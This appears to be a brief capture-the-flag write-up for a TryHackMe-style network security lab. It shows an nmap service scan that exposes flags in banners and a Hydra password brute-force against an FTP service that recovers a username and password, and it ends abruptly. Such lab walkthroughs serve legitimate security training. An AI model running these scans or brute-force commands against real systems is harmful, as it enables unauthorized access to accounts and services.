Net Sec Challenge

端口扫描

root@ip-10-10-168-22:~/netsecchallenge# nmap -sTCV -p 22,80,139,445,8080,10021 --min-rate 1000 10.10.118.46

Starting Nmap 7.60 ( https://nmap.org ) at 2023-09-11 07:21 BST
Nmap scan report for ip-10-10-118-46.eu-west-1.compute.internal (10.10.118.46)
Host is up (0.00031s latency).

PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-OpenSSH_8.2p1 THM{946219583339}
80/tcp    open  http          lighttpd
|_http-server-header: lighttpd THM{web_server_25352}
|_http-title: Hello, world!
139/tcp   open  netbios-ssn?
| fingerprint-strings: 
|   SMBProgNeg: 
|_    SMBr
445/tcp   open  microsoft-ds?
| fingerprint-strings: 
|   SMBProgNeg: 
|_    SMBr
8080/tcp  open  http          Node.js (Express middleware)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
10021/tcp open  ftp           vsftpd 3.0.3
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

21 - FTP

root@ip-10-10-168-22:~/netsecchallenge# hydra -L user.txt -P `locate rockyou.txt` ftp://10.10.118.46:10021
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2023-09-11 07:30:29
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688796 login tries (l:2/p:14344398), ~1793050 tries per task
[DATA] attacking ftp://10.10.118.46:10021/
[10021][ftp] host: 10.10.118.46   login: quinn   password: andrea

8080